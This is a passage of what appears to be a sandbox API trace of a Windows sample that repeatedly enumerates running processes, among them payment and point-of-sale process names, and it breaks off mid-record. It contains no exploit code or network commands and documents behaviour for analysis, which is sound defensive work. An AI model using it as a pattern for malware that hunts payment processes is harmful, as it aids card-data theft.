lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.904] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.905] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.907] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.914] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.916] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.918] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.930] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.931] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0215.933] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.935] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0215.936] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0215.938] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0215.940] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0215.942] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.943] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.945] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0215.946] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.948] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.996] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0215.999] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0216.000] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0216.002] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.004] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0216.005] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0216.007] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0216.008] CloseHandle (hObject=0x1eb8) returned 1 [0216.008] Sleep (dwMilliseconds=0x64) [0216.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0216.062] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.065] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.067] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.069] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.070] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.072] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.114] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.115] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.117] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.118] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.120] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.121] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.123] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.124] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.126] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.128] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.129] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.131] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.132] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.134] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0216.135] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.137] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0216.139] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0216.141] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0216.143] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0216.145] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0216.181] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.183] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0216.185] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.186] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.188] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0216.189] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.190] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.192] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.194] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0216.195] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0216.197] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0216.227] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0216.229] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0216.230] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0216.232] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0216.233] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0216.235] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0216.237] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0216.239] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0216.240] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0216.242] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0216.243] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0216.287] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0216.289] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0216.290] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0216.292] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0216.293] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0216.295] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 